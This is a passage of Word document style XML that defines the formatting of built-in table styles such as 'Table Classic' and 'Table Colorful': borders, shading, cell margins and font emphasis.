      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="808080" w:sz="6" w:space="0"/>
          <w:bottom w:val="single" w:color="FFFFFF" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="109">
    <w:name w:val="Table 3D effects 3"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="single" w:color="808080" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:right w:val="single" w:color="FFFFFF" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="solid" w:color="C0C0C0" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="pct50" w:color="C0C0C0" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="808080" w:sz="6" w:space="0"/>
          <w:bottom w:val="single" w:color="FFFFFF" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="110">
    <w:name w:val="Table Classic 1"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:r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i/>
        <w:iCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:right w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="neCell">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>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11">
    <w:name w:val="Table Classic 2"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:r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color w:val="FFFFFF"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="800080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">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shd w:val="solid" w:color="C0C0C0" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="neCell">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="800080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:rPr>
        <w:color w:val="000080"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="112">
    <w:name w:val="Table Classic 3"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000080"/>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cPr>
      <w:shd w:val="solid" w:color="C0C0C0" w:fill="FFFFFF"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:color w:val="FFFFFF"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="000080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="000080"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="113">
    <w:name w:val="Table Classic 4"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="000000" w:sz="12" w:space="0"/>
        <w:left w:val="single" w:color="000000" w:sz="6" w:space="0"/>
        <w:bottom w:val="single" w:color="000000" w:sz="12" w:space="0"/>
        <w:right w:val="single" w:color="000000" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:color w:val="FFFFFF"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct50" w:color="000080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:color w:val="000080"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="pct50" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:rPr>
        <w:color w:val="000080"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="114">
    <w:name w:val="Table Colorful 1"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="008080" w:sz="12" w:space="0"/>
        <w:left w:val="single" w:color="008080" w:sz="12" w:space="0"/>
        <w:bottom w:val="single" w:color="008080" w:sz="12" w:space="0"/>
        <w:right w:val="single" w:color="008080" w:sz="12" w:space="0"/>
        <w:insideH w:val="single" w:color="00FFFF" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="solid" w:color="008080" w:fill="FFFFFF"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="000080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="115">
    <w:name w:val="Table Colorful 2"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:bottom w:val="single" w:color="000000" w:sz="12" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="pct20" w:color="FFFF00" w:fill="FFFFFF"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:color w:val="FFFFFF"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="12" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="800000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="C0C0C0" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="116">
    <w:name w:val="Table Colorful 3"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="000000" w:sz="18" w:space="0"/>
        <w:left w:val="single" w:color="000000" w:sz="18" w:space="0"/>
        <w:bottom w:val="single" w:color="000000" w:sz="18" w:space="0"/>
        <w:right w:val="single" w:color="000000" w:sz="18" w:space="0"/>
        <w:insideH w:val="single" w:color="C0C0C0" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="pct25" w:color="008080" w:fill="FFFFFF"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="008080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="single" w:color="000000" w:sz="36" w:space="0"/>
          <w:right w:val="single" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="008080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FFFFFF"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="117">
    <w:name w:val="Table Columns 1"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>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blStylePr w:type="firstRow">
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="double" w:color="000000" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs w:val="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band1Vert">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="pct25" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="pct25" w:color="FFFF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18">
    <w:name w:val="Table Columns 2"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:color w:val="FFFFFF"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="000080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:color w:val="00000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band1Vert">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="pct30" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="pct25" w:color="00FF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19">
    <w:name w:val="Table Columns 3"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="000080" w:sz="6" w:space="0"/>
        <w:left w:val="single" w:color="000080" w:sz="6" w:space="0"/>
        <w:bottom w:val="single" w:color="000080" w:sz="6" w:space="0"/>
        <w:right w:val="single" w:color="000080" w:sz="6" w:space="0"/>
        <w:insideV w:val="single" w:color="000080" w:sz="6" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:color w:val="FFFFFF"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="000080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="000080" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs w:val="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band1Vert">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="solid" w:color="C0C0C0" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="pct10" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="neCell">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="120">
    <w:name w:val="Table Columns 4"/>
    <w:basedOn w:val="106"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
    </w:rPr>
    <w:tblPr>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:color w:val="FFFFFF"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="solid" w:color="000000" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">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Vert">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="pct50" w:color="008080" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Vert">
      <w:rPr>
        <w:color w:val="auto"/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
